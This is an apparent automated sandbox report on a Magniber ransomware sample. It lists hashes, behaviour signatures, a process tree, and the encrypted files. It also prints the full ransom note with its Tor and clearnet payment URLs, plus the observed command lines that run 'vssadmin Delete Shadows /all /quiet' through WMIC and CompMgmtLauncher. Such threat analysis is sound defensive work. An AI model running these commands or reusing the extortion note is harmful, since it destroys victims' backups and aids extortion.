Analysis

  • max time kernel
    239s
  • max time network
    240s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    22-07-2021 19:23

General

  • Target

    magnibar_5301e5deb37674296e48d5873862ce32f934fbdfe1a7919f97bddb1138957e35.exe

  • Size

    21KB

  • MD5

    191889cccd8827cb28b5cf9c3a559366

  • SHA1

    c1a6bc0e5d66524eaefa935e9d1dca0c9223bead

  • SHA256

    5301e5deb37674296e48d5873862ce32f934fbdfe1a7919f97bddb1138957e35

  • SHA512

    6d3af286eaa1c3051a739edeaa5f5684f31ff0575082bcd1c2155acfa82657b06b70d7aefc55be3dc1f0877cd4ca77b13f9e53720f5123339bf85eb36bfdfcdf

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

  ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
  ====================================================================================================
  Your files are NOT damaged! Your files are modified only. This modification is reversible.
  The only 1 way to decrypt your files is to receive the private key and decryption program.
  Any attempts to restore your files with the third party software will be fatal for your files!
  ====================================================================================================
  To receive the private key and decryption program follow the instructions below:
  1. Download "Tor Browser" from https://www.torproject.org/ and install it.
  2. In the "Tor Browser" open your personal page here:
     http://0ab812b814784a70bauxkhdcf.ndkeblzjnpqgpo5o.onion/uxkhdcf
  Note! This page is available via "Tor Browser" only.
  ====================================================================================================
  Also you can use temporary addresses on your personal page without using "Tor Browser":
  http://0ab812b814784a70bauxkhdcf.bejoin.space/uxkhdcf
  http://0ab812b814784a70bauxkhdcf.lieedge.casa/uxkhdcf
  http://0ab812b814784a70bauxkhdcf.wonride.site/uxkhdcf
  http://0ab812b814784a70bauxkhdcf.lognear.xyz/uxkhdcf
  Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://0ab812b814784a70bauxkhdcf.ndkeblzjnpqgpo5o.onion/uxkhdcf

http://0ab812b814784a70bauxkhdcf.bejoin.space/uxkhdcf

http://0ab812b814784a70bauxkhdcf.lieedge.casa/uxkhdcf

http://0ab812b814784a70bauxkhdcf.wonride.site/uxkhdcf

http://0ab812b814784a70bauxkhdcf.lognear.xyz/uxkhdcf

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1124
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1984
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://0ab812b814784a70bauxkhdcf.bejoin.space/uxkhdcf^&1^&46759078^&73^&307^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1768
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://0ab812b814784a70bauxkhdcf.bejoin.space/uxkhdcf&1&46759078&73&307&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1808
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1808 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1688
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1672
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1632
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1220
    • C:\Users\Admin\AppData\Local\Temp\magnibar_5301e5deb37674296e48d5873862ce32f934fbdfe1a7919f97bddb1138957e35.exe
      "C:\Users\Admin\AppData\Local\Temp\magnibar_5301e5deb37674296e48d5873862ce32f934fbdfe1a7919f97bddb1138957e35.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1652
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:572
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:364
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:824
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        PID:1348
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1184
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:564
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1648
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1680
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1996
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1796
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1644
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:276
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1636
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      PID:556
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1584
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1876
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:996
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1276
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:764
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1636
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1915609904-1400242751317885946-2056629828158640875910523623961716116093-708400240"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:556
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:564

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\DXEYWGO7.txt
  • C:\Users\Admin\Desktop\AssertOptimize.rtf.uxkhdcf
  • C:\Users\Admin\Desktop\ConfirmApprove.crw.uxkhdcf
  • C:\Users\Admin\Desktop\ConvertToPublish.xlsx.uxkhdcf
  • C:\Users\Admin\Desktop\DebugSkip.png.uxkhdcf
  • C:\Users\Admin\Desktop\GrantImport.doc.uxkhdcf
  • C:\Users\Admin\Desktop\RenameDisconnect.odp.uxkhdcf
  • C:\Users\Admin\Desktop\SkipAdd.png.uxkhdcf
  • C:\Users\Admin\Desktop\SplitProtect.pot.uxkhdcf
  • C:\Users\Admin\Desktop\UnregisterUndo.pps.uxkhdcf
  • C:\Users\Admin\Desktop\readme.txt
  • C:\Users\Public\readme.txt
  • \??\PIPE\srvsvc